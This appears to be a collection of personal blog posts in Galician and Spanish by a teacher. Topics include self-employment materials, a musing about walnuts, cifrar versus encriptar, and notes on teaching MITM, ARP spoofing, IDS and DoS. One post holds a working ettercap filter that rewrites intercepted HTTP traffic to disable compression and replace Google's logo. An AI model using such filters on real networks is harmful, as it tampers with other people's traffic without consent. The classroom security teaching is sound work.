Cousas do Meluco

Onte tocou asisitir como alumno a un mini-curso de presentación dos novos materiais de BIC Galicia sobre autoemprego. A verdade que foi máis interesante do que eu agardaba.

Os materiais están ben pensados para o traballo en clase, incluen as referencias necesarias e fan moito fincapé en aclarar os conceptos de “empresa”, “empresario” e “emprendedor”, así como nos xeitos de validar as ideas antes de iniciar o proyecto de empresa. Tódolos libriños para os alumnos estarán dispoñibles dentro de pouco na páxina web de BIC Galicia.

Agora toca compartir o dito material cos alumnos, a ver se lle poden sacar partido.

En casa temos unha cunca grande de madeira, chea de noces. Cando paso pola cociña collo algunha noz e miro de abrila apretandoa cos dedos. Algunhas están moi duras e as deixo outra vez na cunca, pero sempre atopo algunha que está máis doada de abrir e difruto comendoa.

Ó final sempre pasa o mesmo. As noces duras rematan no final da cunca e cando xa non queda ningunha noz facil de abrir, hai que roer nas duras.

Pregúntome ata que punto a vida parécese a unha cunca de noces.

 Desde logo que hai cousas que son divertidas. Se me dixeran que co ettercap se podia facer este tipo de tonterías teríao estudiado a fondo moito antes.

if (ip.proto==TCP) {
if (tcp.dst==80) {
if (search(DATA.data, “Accept-Encoding”)) {
replace(”Accept-Encoding: gzip,deflate”, “Accept-Encoding: text “);
replace(”Accept-Encoding: deflate,gzip”, “Accept-Encoding: text “);
replace(”Accept-Encoding: deflate”, “Accept-Encoding: text “);
replace(”Accept-Encoding: gzip”, “Accept-Encoding: txt”);
msg(”Evitando formatos comprimidos…\n”);
}
}
if (tcp.src==80) {
if (search(DATA.data, “/intl/en_com/images/logo_plain.png”)) {
replace(”/intl/en_com/images/logo_plain.png”, “ftp://partenon.local/daniel/lo.png”);
msg(”Google Meluquizado…\n”);
}
}
}

A veces las personas necesitamos sentirnos mejor. A veces intentamos consegirlo buscando la forma de sentirnos parte de un grupo social en el que se valoren nuestras capacidades o actitudes. Esto es natural y forma parte de nuestra naturaleza.

El problema llega cuando decidimos (inconscientes) formar parte de un grupo social basado en la exclusión. Esto grupos existen únicamente porque ayudan a sus miembros a sentirse parte integrada de una comunidad, sin ofrecer más beneficio a propios o ajenos. El mecanismo por el que consiguen esto es mediante la exclusión y el menosprecio de otras comunidades de personas. Muchos grupos nacionalistas (de naciones pequeñas o grandes, no importa), agrupaciones políticas, religiosas, peñas deportivas antideportivas… muchas de las agrupaciones sociales que defienden posturas más radicales funcionan y se mantienen mediante este mecanismo. Para si mismos, sus miembros son “guais” por comparación con los miembros de otros grupos, que son detestables y represental “al mal”. Y digo “muchas”. Ni todas ni, probablemente, la mayoría.

Algunos de estos grupos se conforman en causas lingüisticas (lenguas de naciones extensas o discretas, no importa). Concretamente se está creando una comunidad que tiene la misión sagrada de purificar el argot informático y quemar a los brujos neologistas ignorantes. Pues bueno…

Como siempre é tenido la tendencia de no hacer demasiado caso de lo que me dicen en tanto y en cuanto no compruebo la conveniencia de hacerlo, y dado que esta gente no esgrime más argumento que “conservar el idioma”, creo que no les haré caso. Así que continuaré usando las palabras “cifrar” y “encriptar” de forma diferenciada, como me lo enseñaron en su moment:

• Emplearé  cifrar para referirme a codificar datos de forma que la información contenida permanezca oculta y sea solo accesible a quienes conozcan el cifrado empleado.
• Emplearé encriptado para referirme a la codificación matemática de una serie de datos de forma que estos no sean recuperables en forma alguna.

Todo esto en teoría, claro.

Brasil obliga a consultar una web de aplicaciones libres antes de crear una aplicación nueva

Durante esta semana, no curso, centreime demasiado nos ataques de MITM e o spoofing de ARP e certificados. Son atáques doados de realizar e que permiten ver resultados inmediatos. Creo que o máis interesante é que despertan o interés dos alumnos e fannos conscientes de que todos estamos expostos a este tipo de ataques; axudalles a deixar de velos como algo lonxano e complicado para pasar a ter unha imaxe dos mesmos como algo simple e que pode entrer na cotidianidade.

Mañá toca retomar os temas básicos e centrarse en coñecer mellor os sistemas *NIX. Imos darlle unha volta á xestión básica de usuarios é os permisos e etributos do sistema de ficheiros. Dependendo de como vexa a cousa retareinos a tentar realizar un ataque de MITM contra equipos coa táboa ARP blindada.

Dentro duns dias empezarei coas ferramentas IDS (sistemas de detección de intrusións) e con outros tipos de ataques de rede (DoS por flood de diferentes tipos). Logo chegará o ,o,emtp de facer algunha avaliación.